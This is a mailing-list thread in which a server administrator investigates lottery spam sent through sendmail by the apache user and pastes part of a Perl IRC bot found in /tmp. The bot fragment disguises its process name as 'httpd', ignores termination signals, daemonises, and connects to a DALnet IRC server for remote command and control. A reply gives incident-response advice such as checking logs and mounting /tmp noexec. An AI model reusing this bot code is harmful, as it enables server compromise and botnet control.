CodeHeads wrote:
There is something wrong but I cannot nail it down.
I am receiving hundreds of bounce backs from the web server I am running. Not
sure how they are sending mail. The only mail that should be sent is from
forms. Here is a header of one of queues. Maybe someone has run into this.
V8
T1147739033
K1147739138
N1
P34672
Mhost map: lookup (zdnetmail.com): deferred
F8bs
$_apache@localhost
${daemon_flags}c u
Sapache
Aapache@xxxxxxxxxxxxxx
rRFC822; galactica7@xxxxxxxxxxxxx
RPFD:galactica7@xxxxxxxxxxxxx
H?P?Return-Path: <<81>g>
H??Received: (from apache@localhost)
by code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524;
Mon, 15 May 2006 20:23:53 -0400
H?D?Date: Mon, 15 May 2006 20:23:53 -0400
H?x?Full-Name: Apache
H?M?Message-Id: <200605160023.k4G0NrpQ017524@xxxxxxxxxxxxxx>
H??To: galactica7@xxxxxxxxxxxxx
H??Subject: WINNING NOTIFICATION
H??From: NATIONAL LOTTERY <claimsagent_2006_2007@xxxxxxxxxxx>
What is bothering me is this:
by code-heads.com (8.13.4/8.13.4/**Submit**) id k4G0NrpQ017524;
Right, that should tell you that the mail headers you are looking at
seem to be generated by something running as user apache (probably a
CGI/PHP script of some kind running via your web server), which is
calling the local sendmail on that server to send the mail out. It's
nothing to do with postfix at all.
Sorry again, but looky what I found in the /tmp dir:
The whole thing is not copy and pasted:
#!/usr/bin/perl
# r00t teh pl4net! gr33t t0 Myhack@DALnet
# ------[eof]-----
system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print
$1;}'`");
my $processo = 'httpd';
# morgan the code that you need to rip ends here
my @titi = ("Cube-|");
my $sleep='5';
my $linas_max='4';
my @adms=("apaii","KingFighter");
my @hostauth=("roundtable.cif.rochester.edu","202.142.215.209");
my @canais=("#conn");
my $nick= $titi[rand scalar @titi];
my $ircname = $titi[rand scalar @titi];
chop (my $realname = $titi[rand scalar @titi]);
$servidor='rumble.dal.net' unless $servidor;
my $porta='6667';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if
(defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket;
What I cannot understand is how someone can upload to the tmp dir. I guess I
am still learning. Can someone shed some light on this?
This is communicating with an IRC server, probably to listen for commands.
Look at the owner of the script. If it's apache, you can safely say that
a webserver exploit was used to upload it. You could try looking at the
timestamp of the file, and look in your web server log files for
suspicious activity at around that time to get a clue as to how it got
there.
If you have /tmp on a separate partition, I'd seriously consider
mounting it noexec,nodev. If it's not a separate partition, I'd
seriously consider making one for it on an Internet-exposed web server.
Same goes for /var.
Paul.
